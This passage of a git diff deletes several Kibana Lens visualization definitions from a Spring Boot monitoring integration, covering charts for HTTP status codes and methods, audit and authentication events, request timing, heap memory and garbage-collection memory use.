"9a043bf0-329d-4632-a095-86760550bd75" - ], - "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "21757728-2591-42a8-bed5-10cc5c097d85", - "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "showSingleSeries": false, - "verticalAlignment": "top" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "HTTP Request status code [Logs Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json deleted file mode 100644 index c86e9da7ff5..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00.json +++ /dev/null @@ -1,216 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "41dbf555-e40a-45dc-83d7-18b18263e8de": { - "columnOrder": [ - "3624c7a7-411d-4138-9fdf-8b8a0694d285", - "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "a84b9b2d-8712-4975-a242-7996161a71da", - "5209c821-5ae2-40d6-b2c5-321b76c96ebc", - "52932019-4385-469b-9f4d-6becd3a912f6", - "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" - ], - "columns": { - "3624c7a7-411d-4138-9fdf-8b8a0694d285": { - "dataType": "string", - "isBucketed": true, - "label": "Top 100 values of spring_boot.audit_events.document_id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 100 - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.document_id" - }, - "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Host", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.data.remote_address" - }, - "52932019-4385-469b-9f4d-6becd3a912f6": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Session ID", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.data.session_id" - }, - "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Authentication type", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.type" - }, - "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": false, - "interval": "1s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a84b9b2d-8712-4975-a242-7996161a71da": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Principal", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.principal" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.audit_events" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.audit_events" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", - "hidden": false, - "isTransposed": false, - "width": 166 - }, - { - "alignment": "center", - "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", - "isTransposed": false, - "width": 183.41666666666669 - }, - { - "alignment": "center", - "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", - "isTransposed": false, - "width": 296.41666666666674 - }, - { - "alignment": "center", - "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", - "hidden": true, - "isTransposed": false - }, - { - "alignment": "center", - "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "isTransposed": false, - "width": 128.16666666666652 - }, - { - "alignment": "center", - "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", - "isTransposed": false - } - ], - "fitRowToContent": true, - "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", - "layerType": "data", - "paging": { - "enabled": true, - "size": 10 - }, - "rowHeight": "auto", - "rowHeightLines": 2, - "sorting": { - "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", - "direction": "desc" - } - } - }, - "title": "Audit Events [Logs Spring Boot]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 22f3c2c59de..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { - "columnOrder": [ - "59a904ae-9fcd-4d06-b201-09117b1981d6", - "9a043bf0-329d-4632-a095-86760550bd75" - ], - "columns": { - "59a904ae-9fcd-4d06-b201-09117b1981d6": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of http.request.method", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9a043bf0-329d-4632-a095-86760550bd75", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.request.method" - }, - "9a043bf0-329d-4632-a095-86760550bd75": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "59a904ae-9fcd-4d06-b201-09117b1981d6" - ], - "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "layerType": "data", - "legendDisplay": "show", - "metric": "9a043bf0-329d-4632-a095-86760550bd75", - "nestedLegend": true, - "numberDisplay": "percent" - } - ], - "shape": "pie" - } - }, - "title": "HTTP Request method types [Metrics Spring Boot]", - "visualizationType": "lnsPie" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json b/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json deleted file mode 100644 index 24d35465708..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00.json +++ /dev/null @@ -1,131 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "73272b0b-e1d4-4a44-9904-adaad0d24159": { - "columnOrder": [ - "2fe1f301-207a-48ff-aa1c-13aaed31b9db", - "1b8c4683-1d76-49cc-95c8-691612657847" - ], - "columns": { - "1b8c4683-1d76-49cc-95c8-691612657847": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "___records___" - }, - "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Authentication Type", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1b8c4683-1d76-49cc-95c8-691612657847", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "spring_boot.audit_events.type" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.audit_events" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.audit_events" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "2fe1f301-207a-48ff-aa1c-13aaed31b9db" - ], - "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", - "layerType": "data", - "legendDisplay": "show", - "legendMaxLines": 1, - "legendPosition": "bottom", - "metric": "1b8c4683-1d76-49cc-95c8-691612657847", - "nestedLegend": true, - "numberDisplay": "percent", - "truncateLegend": true - } - ], - "shape": "pie" - } - }, - "title": "Authentication type [Logs Spring Boot]", - "visualizationType": "lnsPie" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index 1930d582574..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,111 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "786d6832-6c69-42e4-916f-df6df259fad1": { - "columnOrder": [ - "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", - "19721a51-8e2d-4e20-993c-b8d31c721d0f" - ], - "columns": { - "19721a51-8e2d-4e20-993c-b8d31c721d0f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Avg time", - "operationType": "average", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "event.duration" - }, - "575bdfd0-6d2b-4c15-98f1-760a7c18a50a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "1m" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "19721a51-8e2d-4e20-993c-b8d31c721d0f" - ], - "layerId": "786d6832-6c69-42e4-916f-df6df259fad1", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "575bdfd0-6d2b-4c15-98f1-760a7c18a50a", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "19721a51-8e2d-4e20-993c-b8d31c721d0f" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Average time taken to handle the HTTP request-response exchange [Logs Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.2.0" - }, - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-786d6832-6c69-42e4-916f-df6df259fad1", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index a8aad2d1ac8..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,156 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { - "columnOrder": [ - "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", - "07747e2a-9e75-47d8-b1d4-87c0340cf60d", - "9b2297d6-8625-44a3-a7ba-633da40efcfb" - ], - "columns": { - "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Heap Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.memory.heap.used" - }, - "9b2297d6-8625-44a3-a7ba-633da40efcfb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Non Heap Used", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "spring_boot.memory.non_heap.used" - }, - "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.memory" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.memory" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "accessors": [ - "07747e2a-9e75-47d8-b1d4-87c0340cf60d", - "9b2297d6-8625-44a3-a7ba-633da40efcfb" - ], - "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Memory" - } - }, - "title": "Heap and non-heap memory [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:39:23.315Z", - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json deleted file mode 100644 index b2ddccc84d8..00000000000 --- a/packages/spring_boot/kibana/lens/spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd.json +++ /dev/null @@ -1,609 +0,0 @@ -{ - "attributes": { - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e937f0c4-f880-4837-9315-69d043a3f6b1": { - "columnOrder": [ - "94f7e582-69e9-4fe4-9111-75aaa6a3d470", - "01e713a3-bda9-4e10-b460-988900367abf", - "df8aa04a-8859-48a8-8624-e204eb09ad23", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9", - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1", - "df8aa04a-8859-48a8-8624-e204eb09ad23X2", - "df8aa04a-8859-48a8-8624-e204eb09ad23X3", - "df8aa04a-8859-48a8-8624-e204eb09ad23X4", - "df8aa04a-8859-48a8-8624-e204eb09ad23X5", - "df8aa04a-8859-48a8-8624-e204eb09ad23X6", - "df8aa04a-8859-48a8-8624-e204eb09ad23X7", - "df8aa04a-8859-48a8-8624-e204eb09ad23X8", - "df8aa04a-8859-48a8-8624-e204eb09ad23X9" - ], - "columns": { - "01e713a3-bda9-4e10-b460-988900367abf": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Before", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "formula": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", - "isFormulaBroken": false - }, - "references": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9" - ], - "scale": "ratio" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.code_cache.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.metaspace.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Before", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7" - ], - "name": "add", - "type": "function" - }, - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" - ], - "location": { - "max": 624, - "min": 0 - }, - "name": "add", - "text": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", - "type": "function" - } - }, - "references": [ - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" - ], - "scale": "ratio" - }, - "94f7e582-69e9-4fe4-9111-75aaa6a3d470": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of spring_boot.gc.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "spring_boot.gc.name" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "After", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - }, - "formula": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", - "isFormulaBroken": false - }, - "references": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X9" - ], - "scale": "ratio" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.code_cache.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.metaspace.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", 